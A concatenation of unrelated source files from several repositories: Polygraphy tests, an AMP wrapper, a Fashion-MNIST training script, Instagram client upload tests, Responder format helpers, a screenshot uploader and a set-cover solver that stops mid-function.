Name: onnx_graphsurgeon | Opset: 11
---- 0 Graph Inputs ----
{}
---- 1 Graph Outputs ----
{const_out [dtype=float32, shape=(14, 14)]}
---- 0 Initializers ----
---- 1 Nodes ----
Node 0 | [Op: Constant]
{} -> {const_out [dtype=float32, shape=(14, 14)]}
---- Attributes ----
value = Tensor: [dtype=float32, shape=[14, 14]] | Values:
[[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]]
"""
],
["scan", "full",
"""
[I] ==== ONNX Model ====
Name: graph | Opset: 10
---- 2 Graph Inputs ----
{initial [dtype=float32, shape=(2,)], x [dtype=float32, shape=(3, 2)]}
---- 2 Graph Outputs ----
{y [dtype=float32, shape=(2,)], z [dtype=float32, shape=(3, 2)]}
---- 0 Initializers ----
---- 1 Nodes ----
Node 0 | [Op: Scan]
{initial [dtype=float32, shape=(2,)], x [dtype=float32, shape=(3, 2)]}
-> {y [dtype=float32, shape=(2,)], z [dtype=float32, shape=(3, 2)]}
---- Attributes ----
body =
---- 2 Subgraph Inputs ----
{sum_in [dtype=float32, shape=(2,)], next [dtype=float32, shape=(2,)]}
---- 2 Subgraph Outputs ----
{sum_out [dtype=float32, shape=(2,)], scan_out [dtype=float32, shape=(2,)]}
---- 0 Initializers ----
---- 2 Nodes ----
Node 0 | [Op: Add]
{sum_in [dtype=float32, shape=(2,)], next [dtype=float32, shape=(2,)]}
-> {sum_out [dtype=float32, shape=(2,)]}
Node 1 | [Op: Identity]
{sum_out [dtype=float32, shape=(2,)]}
-> {scan_out [dtype=float32, shape=(2,)]}
num_scan_inputs = 1
"""
],
]
@pytest.mark.parametrize("case", ONNX_CASES, ids=lambda case: "{:}-{:}".format(case[0], case[1]))
def test_polygraphy_inspect_model_onnx(run_inspect_model, case):
model, mode, expected = case
status = run_polygraphy_inspect(["model", ONNX_MODELS[model].path, "--mode={:}".format(mode)], disable_verbose=True)
expected = dedent(expected).strip()
actual = status.stdout.decode()
print("Actual output:\n{:}".format(actual))
for acline, exline in zip(actual.splitlines(), expected.splitlines()):
acline = acline.rstrip()
exline = exline.rstrip()
print("Checking line : {:}".format(acline))
print("Expecting line: {:}".format(exline))
assert acline == exline
@pytest.mark.parametrize("model", ["identity", "scan", "tensor_attr"])
def test_polygraphy_inspect_model_trt_sanity(run_inspect_model, model):
import tensorrt as trt
if model == "tensor_attr" and version(trt.__version__) < version("7.2"):
pytest.skip("Models with constant outputs were not supported before 7.2")
if model == "scan" and version(trt.__version__) < version("7.0"):
pytest.skip("Scan was not supported until 7.0")
run_inspect_model([ONNX_MODELS[model].path, "--display-as=trt"])
def test_polygraphy_inspect_model_trt_engine_sanity(run_inspect_model):
with tempfile.NamedTemporaryFile() as outpath:
run_polygraphy_run([ONNX_MODELS["identity"].path, "--trt", "--save-engine", outpath.name])
run_inspect_model([outpath.name, "--model-type=engine"])
def test_polygraphy_inspect_model_tf_sanity(run_inspect_model):
run_inspect_model([TF_MODELS["identity"].path, "--model-type=frozen"])
#
# INSPECT RESULTS
#
@pytest.mark.parametrize("opts", [[], ["--show-values"]])
def test_polygraphy_inspect_results(opts):
with tempfile.NamedTemporaryFile() as outpath:
run_polygraphy_run([ONNX_MODELS["identity"].path, "--onnxrt", "--save-results", outpath.name])
run_polygraphy_inspect(["results", outpath.name] + opts)
```
#### File: pytorch_quantization/utils/amp_wrapper.py
```python
from absl import logging
try:
import apex.amp as amp
def half_function(fn):
return amp.half_function(fn)
def float_function(fn):
return amp.float_function(fn)
def promote_function(fn):
return amp.promote_function(fn)
except Exception:
logging.error("AMP is not avaialble.")
def half_function(fn):
return fn
def float_function(fn):
return fn
def promote_function(fn):
return fn
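# Hedged usage sketch (not part of the original file): any of the wrappers above can be
# applied as a decorator. The function below is hypothetical.
#
#   @half_function
#   def linear_forward(x, weight):
#       return x @ weight
#
# With apex installed, the call is routed through amp's casting wrapper; otherwise the
# fallback defined above simply returns the function unchanged.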
``` |
{
"source": "5hade5layer/IRIS-Dataset",
"score": 3
} |
#### File: IRIS-Dataset/fashion-mnist/train.py
```python
import tensorflow as tf
from tensorflow import keras
import matplotlib.pyplot as plt
from codecarbon import EmissionsTracker #Energy Usage
tracker = EmissionsTracker()
#@track_emissions(project_name="asd screening")
class myCallback(tf.keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs={}):
        if logs.get('loss') < 0.1:
            print("\nLoss dropped below 0.1, stopping training")
self.model.stop_training = True
def main():
mnist = tf.keras.datasets.fashion_mnist
(training_images, training_labels), (test_images, test_labels) = mnist.load_data()
#Image in index 0
plt.imshow(training_images[0])
#print(training_labels[0])
#print(training_images[0])
#Image in index 42
plt.imshow(training_images[42])
#print(training_labels[42])
#print(training_images[42])
training_images = training_images/255.0
test_images = test_images/255.0
callbacks = myCallback()
model = tf.keras.Sequential([keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation=tf.nn.relu),
tf.keras.layers.Dense(10, activation=tf.nn.softmax)])
    model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
    model.fit(training_images, training_labels, epochs=130, callbacks=[callbacks])
    # evaluate() returns [loss, accuracy] because metrics=['accuracy'] was requested above
    test_loss, test_accuracy = model.evaluate(test_images, test_labels)
    train_loss, train_accuracy = model.evaluate(training_images, training_labels)
    print("Test Accuracy: ", test_accuracy)
    print("Train Accuracy: ", train_accuracy)
if __name__ == "__main__":
tracker.start()
main()
emi: float=tracker.stop()
print(f"overall emmisions:{emi} kg")
emi= emi*89875517873681764
print(f"overall emmisions:{emi} joules")
``` |
{
"source": "5hirish/insta_scrapper",
"score": 3
} |
#### File: tests/web/upload.py
```python
import unittest
import time
try:
# python 2.x
from urllib2 import urlopen
except ImportError:
# python 3.x
from urllib.request import urlopen
import json
from ..common import WebApiTestBase, MockResponse, compat_mock
class UploadTests(WebApiTestBase):
"""Tests for ClientCompatPatch."""
@staticmethod
def init_all(api):
return [
{
'name': 'test_post_photo',
'test': UploadTests('test_post_photo', api),
},
{
'name': 'test_post_photo_mock',
'test': UploadTests('test_post_photo_mock', api),
},
]
@unittest.skip('Modifies data')
def test_post_photo(self):
sample_url = 'https://c1.staticflickr.com/5/4103/5059663679_85a7ec3f63_b.jpg'
res = urlopen(sample_url)
photo_data = res.read()
results = self.api.post_photo(photo_data, caption='Feathers #feathers')
self.assertEqual(results.get('status'), 'ok')
self.assertIsNotNone(results.get('media'))
@compat_mock.patch('web.Client._make_request')
def test_post_photo_mock(self, make_request):
ts_now = time.time()
make_request.return_value = {'status': 'ok', 'upload_id': '123456789'}
with compat_mock.patch(
'web.client.compat_urllib_request.OpenerDirector.open') as opener, \
compat_mock.patch('web.client.time.time') as time_mock, \
compat_mock.patch('web.client.random.choice') as rand_choice, \
compat_mock.patch('web.Client._read_response') as read_response, \
compat_mock.patch(
'web.client.compat_urllib_request.Request') as request:
opener.return_value = MockResponse()
time_mock.return_value = ts_now
rand_choice.return_value = 'x'
# add rhx_gis so that we can reuse the same response for init and uploading
read_response.return_value = json.dumps(
{'status': 'ok', 'upload_id': '123456789', 'rhx_gis': '22aea71b163e335a0ad4479549b530d7'},
separators=(',', ':')
)
self.api.post_photo('...'.encode('ascii'), caption='Test')
headers = {
'Accept-Language': 'en-US',
'Accept-Encoding': 'gzip, deflate',
'Origin': 'https://www.instagram.com',
'x-csrftoken': self.api.csrftoken,
'x-instagram-ajax': '1',
'Accept': '*/*',
'User-Agent': self.api.mobile_user_agent,
'Referer': 'https://www.instagram.com/create/details/',
'x-requested-with': 'XMLHttpRequest',
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded'}
body = '--{boundary}\r\n' \
'Content-Disposition: form-data; name="upload_id"\r\n\r\n' \
'{upload_id}\r\n' \
'--{boundary}\r\n' \
'Content-Disposition: form-data; name="media_type"\r\n\r\n1\r\n' \
'--{boundary}\r\n' \
'Content-Disposition: form-data; name="photo"; filename="photo.jpg"\r\n' \
'Content-Type: application/octet-stream\r\n' \
'Content-Transfer-Encoding: binary\r\n\r\n...\r\n' \
'--{boundary}--\r\n'.format(
boundary='----WebKitFormBoundary{}'.format('x' * 16),
upload_id=int(ts_now * 1000))
request.assert_called_with(
'https://www.instagram.com/create/upload/photo/',
body.encode('utf-8'), headers=headers)
``` |
{
"source": "5hirish/responder",
"score": 2
} |
#### File: responder/responder/formats.py
```python
import yaml
import json
async def format_form(r, encode=False):
if not encode:
return await r._starlette.form()
def format_yaml(r, encode=False):
if encode:
r.headers.update({"Content-Type": "application/x-yaml"})
return yaml.dump(r.media)
else:
return yaml.safe_load(r.content)
def format_json(r, encode=False):
if encode:
r.headers.update({"Content-Type": "application/json"})
return json.dumps(r.media)
else:
return json.loads(r.content)
def get_formats():
return {"json": format_json, "yaml": format_yaml, "form": format_form}
``` |
{
"source": "5HT2/fs-over-http",
"score": 3
} |
#### File: fs-over-http/scripts/screenshot.py
```python
from dotenv import load_dotenv
load_dotenv()
from datetime import datetime
import os
import pyperclip
import random
import requests
import string
import subprocess
import sys
import time
CDN_NAME = "frogg.ie"
BASE_URL = "https://{}/".format(CDN_NAME)
FOLDER_P = "https://i.l1v.in/public/i/"
S_FORMAT = "-region"
FILENAME = datetime.now().strftime("%Y-%m-%d-%H:%M:%S.png")
FILEPATH = os.environ.get('HOME') + "/pictures/screenshots/" + FILENAME
# Run bash command
def handle_bash_cmd(command):
process = subprocess.Popen(command, stdout=subprocess.PIPE)
output, error = process.communicate()
if error is not None:
handle_notification("Error Saving", error, "state-error")
exit(1)
# Send a notification
def handle_notification(title, description, icon):
bashCmd = "notify-send|" + title + "|" + description + "|--icon=" + icon + "|--app-name=" + CDN_NAME
handle_bash_cmd(bashCmd.split("|"))
# Generates a random 3-character filename
def get_file_name():
# Choose from "A-z0-9"
letters = string.ascii_letters + string.digits
return ''.join(random.choice(letters) for i in range(3))
# Returns the status code for the current https://frogg.ie/`file_name` url
def get_status_code():
return requests.get(BASE_URL + file_name).status_code
# If the second arg of the script is set, change S_FORMAT
if len(sys.argv) > 1:
S_FORMAT = sys.argv[1]
# Take screenshot with spectacle
bashCmd = "spectacle " + S_FORMAT + " -p -b -n -o=" + FILEPATH + " >/dev/null 2>&1"
handle_bash_cmd(bashCmd.split())
# Wait for spectacle to save the file
while os.path.isfile(FILEPATH) is False:
time.sleep(0.2)
# Get initial filename and status
file_name = get_file_name()
status_code = get_status_code()
# Loop until the filename isn't taken
while status_code == 200:
file_name = get_file_name()
status_code = get_status_code()
# Be sure it's a 404 Not Found
if status_code == 404:
# Upload file
files = {'file': open(FILEPATH, 'rb')}
response = requests.post(FOLDER_P + file_name, files=files, headers={'Auth': os.environ.get("FOH_SERVER_AUTH")})
if response.status_code != 200:
handle_notification("Error " + str(response.status_code), "Response: " + response.headers["X-Server-Message"], "state-error")
exit(1)
pyperclip.copy(BASE_URL + file_name)
handle_notification("Saved screenshot", file_name, "spectacle")
else:
    # The availability check returned something other than 200 or 404; `response` from the
    # upload branch does not exist here, so report the status code from the GET instead.
    handle_notification("Error " + str(status_code), "Unexpected status while checking filename availability", "state-error")
``` |
{
"source": "5hubh4m/data_mining_fall_2016",
"score": 3
} |
#### File: Assignment 2/CSR/CSR.py
```python
class CSR:
def __init__(self):
self.n = 0
self.IA = []
self.JA = []
def __len__(self):
return self.n
def __str__(self):
return self.IA.__str__() + '\n' + self.JA.__str__()
def create(self, g):
self.n = len(g)
self.IA = [0]
for i in range(len(g)):
k = 0
for j in range(len(g)):
if g[i][j] != 0:
k += 1
self.JA.append(j)
self.IA.append(self.IA[i] + k)
def edges_from(self, v):
nodes = []
for i in range(self.IA[v], self.IA[v + 1]):
nodes.append(self.JA[i])
return nodes
```
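A minimal usage sketch for the `CSR` class above (not part of the original assignment code): it builds the compressed sparse row structure from a small adjacency matrix and lists the out-neighbours of a vertex.
```python
# Hypothetical example; assumes the CSR class defined above is in scope.
g = [
    [0, 1, 0],
    [0, 0, 1],
    [1, 0, 0],
]
csr = CSR()
csr.create(g)
print(len(csr))           # 3 vertices
print(csr.IA, csr.JA)     # [0, 1, 2, 3] [1, 2, 0]
print(csr.edges_from(0))  # [1]
print(csr.edges_from(2))  # [0]
```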
#### File: Assignment 2/KSquareTree/KSquareTree.py
```python
from BitVector import BitVector
import math as m
class KSquareTree:
def __init__(self, k):
self.k = k
self.k2 = k * k
self.n = 0
self.h = 0
self.T = BitVector(size=0)
self.L = BitVector(size=0)
def __str__(self):
return self.T.__str__() + '\n' + self.L.__str__()
def __len__(self):
return self.n
def create(self, graph):
"""
Creates a k^2 tree graph representation from the given graph.
:param graph: An adjacency matrix representation of the graph.
It is assumed that len(graph) % k == 0.
:return: None
"""
assert len(graph) % self.k == 0
self.n = len(graph)
self.h = int(m.ceil(m.log(len(graph), self.k)))
temp = [BitVector(size=0) for _ in range(self.h)]
def build(n, l, p, q):
c = BitVector(size=0)
for i in range(self.k):
for j in range(self.k):
if l == self.h - 1:
c = c + BitVector(intVal=graph[p + i][q + j])
else:
c = c + build(n / self.k,
l + 1,
p + i * (n / self.k),
q + j * (n / self.k))
if c == BitVector(size=self.k2):
return BitVector(intVal=0)
temp[l] += c
return BitVector(intVal=1)
build(self.n, 0, 0, 0)
self.L = temp[self.h - 1]
for i in range(self.h - 1):
self.T += temp[i]
def edges_from(self, p):
"""
Returns the list of edges which are neighbours of p.
:param p: Vertex
:return: Vertices which are reachable from p
"""
nodes = []
def direct(n, p, q, x):
if x >= len(self.T):
if self.L[x - len(self.T)] == 1:
nodes.append(q)
else:
if x == -1 or self.T[x] == 1:
y = self.T.rank_of_bit_set_at_index(x) * self.k2 \
+ self.k * int(m.floor(p / (n / self.k)))
for j in range(self.k):
direct(n / self.k,
p % (n / self.k),
q + (n / self.k) * j,
y + j)
direct(self.n, p, 0, -1)
return nodes
def edges_to(self, q):
"""
Returns the list of vertices from which q is reachable.
:param q: Vertex
:return: Vertices from which q can be reached
"""
nodes = []
def reverse(n, q, p, x):
if x >= len(self.T):
if self.L[x - len(self.T)] == 1:
nodes.append(p)
else:
if x == -1 or self.T[x] == 1:
y = self.T.rank_of_bit_set_at_index(x) * self.k2 \
+ self.k * int(m.floor(q / (n / self.k)))
for j in range(self.k):
reverse(n / self.k,
q % (n / self.k),
p + (n / self.k) * j,
y + j * self.k)
reverse(self.n, q, 0, -1)
return nodes
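# Hedged usage sketch (not part of the original file). Note that the original code relies on
# Python 2 semantics, where `/` between ints is integer division; under Python 3 the size
# arithmetic in create/direct/reverse would need `//` instead.
#
#   g = [[0, 1, 0, 0],
#        [0, 0, 1, 0],
#        [0, 0, 0, 1],
#        [1, 0, 0, 0]]
#   tree = KSquareTree(2)
#   tree.create(g)          # builds T (internal levels) and L (leaf bitmap)
#   tree.edges_from(0)      # out-neighbours of vertex 0
#   tree.edges_to(0)        # vertices with an edge into vertex 0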
``` |
{
"source": "5hubh4m/publications_portal",
"score": 3
} |
#### File: publications_portal/creator/forms.py
```python
import copy
from django import forms
from django.db import connection
class AddInstituteForm(forms.Form):
name = forms.CharField(
label='Institute Name',
help_text='Enter the name of the institute here.',
min_length=1
)
city = forms.CharField(
label='City',
help_text='Enter the city of the institute here.',
min_length=1
)
state = forms.CharField(
label='State',
help_text='Enter the state of the institute.',
min_length=1
)
country = forms.CharField(
label='Country',
help_text='Enter the country the institute is in.',
min_length=1
)
postal = forms.CharField(
label='Postal Code',
help_text='Enter the postal code of the institute here.',
min_length=1
)
url = forms.URLField(
label='Institute URL',
help_text='Enter a URL of the institute.',
min_length=1
)
def clean(self):
cleaned_data = super(AddInstituteForm, self).clean()
text_fields = {
'name': cleaned_data.get('name'),
'city': cleaned_data.get('city'),
'state': cleaned_data.get('state'),
'country': cleaned_data.get('country'),
}
for f in text_fields.keys():
if f in cleaned_data and any(char.isdigit() for char in text_fields[f]):
self.add_error('%s' % f, 'Field %s cannot contain numbers.' % f)
if 'postal' in cleaned_data and not all(char.isdigit() for char in cleaned_data.get('postal')):
self.add_error('postal', 'Postal code must be numeric.')
if 'name' in cleaned_data:
with connection.cursor() as cursor:
cursor.execute('SELECT `id` ' +
'FROM `institute` ' +
'WHERE `name`=%s', [cleaned_data['name'], ])
row = cursor.fetchone()
if row is not None and row[0]:
self.add_error('name', 'Institute field with same name exists.')
return self.cleaned_data
class AddDepartmentForm(forms.Form):
name = forms.CharField(
label='Department Name',
help_text='Enter the name of the department here.',
min_length=1
)
def clean(self):
cleaned_data = super(AddDepartmentForm, self).clean()
text_fields = {
'name': cleaned_data.get('name'),
}
for f in text_fields.keys():
if f in cleaned_data and any(char.isdigit() for char in text_fields[f]):
self.add_error(f, 'Field %s cannot contain numbers.' % f)
if 'name' in cleaned_data:
with connection.cursor() as cursor:
cursor.execute('SELECT `id` ' +
'FROM `department` ' +
'WHERE `name`=%s', [cleaned_data['name'], ])
row = cursor.fetchone()
if row is not None and row[0]:
self.add_error('name', 'Department with same name exists.')
return self.cleaned_data
class AddFieldForm(forms.Form):
name = forms.CharField(
label='Field Name',
help_text='Enter the name of the field here.',
min_length=1
)
department1 = forms.ChoiceField(
label='Department(s)',
help_text='Choose the department(s) the field belongs to. ' +
'If a department does not exist. Add one from the menu.',
choices=[]
)
def __init__(self, *args, **kwargs):
super(AddFieldForm, self).__init__(*args, **kwargs)
with connection.cursor() as cursor:
cursor.execute('SELECT `id`, `name` FROM `department`;')
tbl = cursor.fetchall()
dept_choices = list(map(
lambda row: (row[0], row[1]),
tbl
))
self.fields['department1'].choices = dept_choices
def clean(self):
cleaned_data = super(AddFieldForm, self).clean()
text_fields = {
'name': cleaned_data.get('name'),
}
for f in text_fields.keys():
if f in cleaned_data and any(char.isdigit() for char in text_fields[f]):
self.add_error(f, 'Field %s cannot contain numbers.' % f)
if 'name' in cleaned_data:
with connection.cursor() as cursor:
cursor.execute('SELECT `id` ' +
'FROM `publication_field` ' +
'WHERE `title`=%s', [cleaned_data['name'], ])
row = cursor.fetchone()
if row is not None and row[0]:
self.add_error('name', 'Publication field with same name exists.')
i = 0
while True:
if not 'department%d' % (i + 1) in cleaned_data:
break
i += 1
for j in range(0, i):
for k in range(j + 1, i):
if cleaned_data['department%d' % (j + 1)] == cleaned_data['department%d' % (k + 1)]:
self.add_error('department%d' % (j + 1), 'Two department fields cannot be same')
self.add_error('department%d' % (k + 1), 'Two department fields cannot be same')
return self.cleaned_data
class AddAuthorForm(forms.Form):
first_name = forms.CharField(
label='First Name',
strip=True,
min_length=1,
help_text='Enter the author\'s first name.',
)
middle_name = forms.CharField(
label='Middle Name',
strip=True,
required=False,
help_text='Enter the author\'s middle name.',
)
last_name = forms.CharField(
label='Last Name',
strip=True,
min_length=1,
help_text='Enter the author\'s last name.',
)
email = forms.EmailField(
label='Email',
help_text='Enter the author\'s Email here.'
)
url = forms.URLField(
label='Author URL',
widget=forms.URLInput,
help_text='Enter a homepage URL for the author.',
required=False
)
type = forms.ChoiceField(
label='Author Type',
widget=forms.RadioSelect,
choices=[
('Student', 'Student'),
('Faculty', 'Faculty'),
],
help_text='Select the kind of author (Student/Faculty).',
)
institute = forms.ChoiceField(
label='Institute',
choices=[],
help_text='Choose the author\'s institute from the list. ' +
'If your institute does not exist, add one from the menu.'
)
department = forms.ChoiceField(
label='Department',
choices=[],
help_text='Choose the author\'s department from the list. ' +
'If your department does not exist, add one from the menu.'
)
def __init__(self, *args, **kwargs):
super(AddAuthorForm, self).__init__(*args, **kwargs)
with connection.cursor() as cursor:
cursor.execute('SELECT `id`, `name` FROM `department`;')
tbl = cursor.fetchall()
dept_choices = list(map(
lambda row: (row[0], row[1]),
tbl
))
cursor.execute('SELECT `id`, `name` FROM `institute`;')
tbl = cursor.fetchall()
inst_choices = list(map(
lambda row: (row[0], row[1]),
tbl
))
self.fields['institute'].choices = inst_choices
self.fields['department'].choices = dept_choices
def clean(self):
"""
Validate form data.
"""
cleaned_data = super(AddAuthorForm, self).clean()
typ = cleaned_data.get('type')
if 'first_name' in cleaned_data and any(char.isdigit() for char in cleaned_data.get('first_name')):
self.add_error('first_name', 'Name cannot contain numbers.')
if 'middle_name' in cleaned_data and any(char.isdigit() for char in cleaned_data.get('middle_name')):
self.add_error('middle_name', 'Name cannot contain numbers.')
if 'last_name' in cleaned_data and any(char.isdigit() for char in cleaned_data.get('last_name')):
self.add_error('last_name', 'Name cannot contain numbers.')
if 'type' in cleaned_data and typ != 'Student' and typ != 'Faculty':
self.add_error('type', 'Invalid value for type.')
if 'email' in cleaned_data:
with connection.cursor() as cursor:
cursor.execute('SELECT `id` ' +
'FROM `author` ' +
'WHERE `email`=%s', [cleaned_data['email'], ])
row = cursor.fetchone()
if row is not None and row[0]:
self.add_error('email', 'Author with same Email exists.')
return self.cleaned_data
class AddPublisherForm(forms.Form):
name = forms.CharField(
label='Publisher Name',
strip=True,
min_length=1,
help_text='Enter the publisher\'s name.',
)
url = forms.URLField(
label='Publisher URL',
widget=forms.URLInput,
help_text='Enter a homepage URL for the publisher.',
)
type = forms.ChoiceField(
label='Publisher Type',
widget=forms.RadioSelect,
choices=[
('Journal', 'Journal'),
('Conference', 'Conference'),
('Publishing House', 'Publishing House'),
],
help_text='Select the kind of publisher.',
)
def clean(self):
"""
Validate form data.
"""
cleaned_data = super(AddPublisherForm, self).clean()
typ = cleaned_data.get('type')
if 'name' in cleaned_data and any(char.isdigit() for char in cleaned_data.get('name')):
self.add_error('first_name', 'Name cannot contain numbers.')
if 'type' in cleaned_data and typ != 'Conference' and typ != 'Journal' and typ != 'Publishing House':
self.add_error('type', 'Invalid value for type.')
if 'url' in cleaned_data:
with connection.cursor() as cursor:
cursor.execute('SELECT `id` ' +
'FROM `publisher` ' +
'WHERE `url`=%s', [cleaned_data['url'], ])
row = cursor.fetchone()
if row is not None and row[0]:
self.add_error('url', 'Publisher with same URL exists.')
return self.cleaned_data
class AddPublicationForm(forms.Form):
title = forms.CharField(
label='Title',
help_text='The title of the publication.',
min_length=1
)
description = forms.CharField(
label='Description',
required=False,
widget=forms.Textarea,
help_text='A brief abstract of your publication.'
)
url = forms.URLField(
label='URL',
help_text='A URL for your publication.',
required=False,
)
location = forms.CharField(
label='Location',
required=False,
help_text='Enter a location for your publication, it can be the location ' +
'of the conference or that of the publisher.'
)
date = forms.DateField(
label='Date of Publication',
help_text='Date your publication was published. The format is "DD/MM/YYYY".',
input_formats=['%d/%m/%Y', ]
)
code = forms.CharField(
label='Publication Code',
required=False,
help_text='ISBN or similar code for the publication.'
)
publisher = forms.ChoiceField(
label='Publisher',
help_text='Choose the publisher from the list. If yours doesn\'t exist, add one from the menu.',
choices=[]
)
author1 = forms.ChoiceField(
label='Author(s)',
help_text='Choose the author from the list. If yours does not exist, add one from the menu.',
choices=[]
)
degree1 = forms.ChoiceField(
label='Degree',
help_text='The degree/status of author',
choices=[
('first', 'First'),
('second', 'Second'),
('third', 'Third'),
('corresponding', 'Corresponding'),
('other', 'Other')
]
)
field1 = forms.ChoiceField(
label='Field(s)/Area(s)',
help_text='Choose the field(s) your publication belongs to. If yours does not exist, add one from the menu.',
choices=[]
)
def __init__(self, *args, **kwargs):
super(AddPublicationForm, self).__init__(*args, **kwargs)
with connection.cursor() as cursor:
cursor.execute('SELECT `id`, `title` FROM `publication_field`;')
tbl = cursor.fetchall()
field_choices = list(map(
lambda row: (row[0], row[1]),
tbl
))
cursor.execute('SELECT `id`, `first_name`, `last_name` FROM `author`;')
tbl = cursor.fetchall()
author_choices = list(map(
lambda row: (row[0], row[1] + ' ' + row[2]),
tbl
))
cursor.execute('SELECT `id`, `name` FROM `publisher`;')
tbl = cursor.fetchall()
publ_choices = list(map(
lambda row: (row[0], row[1]),
tbl
))
self.fields['publisher'].choices = publ_choices
self.fields['field1'].choices = field_choices
self.fields['author1'].choices = author_choices
def clean(self):
cleaned_data = copy.deepcopy(super(AddPublicationForm, self).clean())
if 'url' in cleaned_data:
with connection.cursor() as cursor:
cursor.execute('SELECT `id` ' +
'FROM `publication` ' +
'WHERE `url`=%s', [cleaned_data['url'], ])
row = cursor.fetchone()
if row is not None and row[0]:
self.add_error('url', 'Publication with same URL exists.')
i = 0
while True:
if not 'author%d' % (i + 1) in cleaned_data:
break
i += 1
for j in range(0, i):
for k in range(j + 1, i):
if cleaned_data['author%d' % (j + 1)] == cleaned_data['author%d' % (k + 1)]:
self.add_error('author%d' % (j + 1), 'Two author fields cannot be same')
self.add_error('author%d' % (k + 1), 'Two author fields cannot be same')
i = 0
while True:
if not 'field%d' % (i + 1) in cleaned_data:
break
i += 1
for j in range(0, i):
for k in range(j + 1, i):
if cleaned_data['field%d' % (j + 1)] == cleaned_data['field%d' % (k + 1)]:
self.add_error('field%d' % (j + 1), 'Two fields cannot be same')
self.add_error('field%d' % (k + 1), 'Two fields cannot be same')
return self.cleaned_data
``` |
{
"source": "5hun/discrete-optimization-setcover",
"score": 3
} |
#### File: 5hun/discrete-optimization-setcover/solver.py
```python
from collections import defaultdict
import itertools as it
import numpy as np
import sys
sys.path.append(r"C:\Program Files\PNN\MIPCL-PY_64")
import mipcl_py.mipshell.mipshell as mp
from ortools.linear_solver import pywraplp
class Problem:
def __init__(self, text):
lines = [tuple(map(int, l.split())) for l in text.split("\n")]
self.n, self.m = lines[0]
self.cost = np.array([x[0] for x in lines[1:] if len(x)], dtype=np.int)
self.sets = tuple(
frozenset(x[1:])
for x in lines[1:] if len(x)
)
def is_feasible(self, sol):
"""Check if the solution is feasible or not"""
assert(len(sol) == self.m)
flg = np.zeros(self.n, dtype=np.bool)
for i, v in enumerate(sol):
if v:
for j in self.sets[i]:
flg[j] = True
return np.all(flg)
def objective(self, sol):
"""Calculate objective value of sol"""
obj = 0
for i, v in enumerate(sol):
if v:
obj += self.cost[i]
return obj
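# Hedged note on the expected input format (inferred from Problem.__init__ above, not from
# original documentation): the first line holds "<n items> <m sets>", and each following
# line describes one set as "<cost> <item> <item> ...". A 3-item, 2-set instance:
#
#   3 2
#   10 0 1
#   5 1 2
#
# Problem(text) then exposes .cost, .sets, is_feasible(sol) and objective(sol), where sol is
# a 0/1 vector of length m indicating which sets are chosen.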
class Reducer:
"""Reduce the size of a problem"""
def __init__(self, p):
"""
Initialization
Parameters
----------
p : Problem
"""
self.p = p
self._create_reduced_problem()
def _create_reduced_problem(self):
self.fixed = {}
self.sets = {
i: set(s)
for i, s in enumerate(self.p.sets)
}
self.e2s = defaultdict(set)
for i in self.sets:
for x in self.sets[i]:
self.e2s[x].add(i)
modified = True
while modified:
modified = False
modified = modified or self._rule2()
modified = modified or self._rule3()
modified = modified or self._rule4p()
assert len(self.fixed) == self.p.m - len(self.sets)
self.use_cols = tuple(sorted(self.sets.keys()))
self.use_rows = tuple(sorted(self.e2s.keys()))
r2i = {x: i for i, x in enumerate(self.use_rows)}
text = "%d %d\n" % (len(self.use_rows), len(self.use_cols))
text += "\n".join(
"%d " % self.p.cost[i] + " ".join(
str(r2i[x]) for x in self.sets[i]
)
for i in self.use_cols
) + "\n"
self.reduced_p = Problem(text)
def _rule2(self):
"""Remove necessary columns(sets)"""
modified = False
xs = tuple(self.e2s.keys())
for x in xs:
if x not in self.e2s:
continue
if len(self.e2s[x]) == 1:
                i = next(iter(self.e2s[x]))  # e2s values are sets, so take the single covering column
self.fixed[i] = 1
for y in self.sets[i]:
del self.e2s[y]
del self.sets[i]
modified = True
return modified
def _rule3(self):
"""Remove unnecessary rows(items)"""
xs = tuple(self.e2s.keys())
modified = False
for x, y in it.combinations(xs, 2):
if x not in self.e2s or y not in self.e2s:
continue
if self.e2s[x] <= self.e2s[y]:
for i in self.e2s[x]:
self.sets[i].remove(x)
del self.e2s[x]
modified = True
elif self.e2s[x] >= self.e2s[y]:
for i in self.e2s[y]:
self.sets[i].remove(y)
del self.e2s[y]
modified = True
return modified
def _rule4p(self):
"""Remove unnecessary columns(sets)"""
js = tuple(self.sets.keys())
modified = False
for i in js:
if i not in self.sets:
continue
ci = self.p.cost[i]
other = 0
for x in self.sets[i]:
other += min(self.p.cost[j] for j in self.e2s[x])
if ci > other or (len(self.sets[i]) > 1 and ci >= other):
del self.sets[i]
self.fixed[i] = 0
modified = True
return modified
def get_original_solution(self, sol):
"""create solution of original problem"""
assert len(sol) == len(self.use_cols)
ret = np.zeros(self.p.m, dtype=np.int)
for i, v in enumerate(sol):
ret[self.use_cols[i]] = v
for i in self.fixed:
ret[i] = self.fixed[i]
return ret
def get_dual_solution(p):
"""Solve the dual of linear relaxation problem and return solution"""
solver = pywraplp.Solver('dual', pywraplp.Solver.GLOP_LINEAR_PROGRAMMING)
u = [
solver.NumVar(0, solver.infinity(), "u%d" % x) for x in range(p.n)
]
for i in range(p.m):
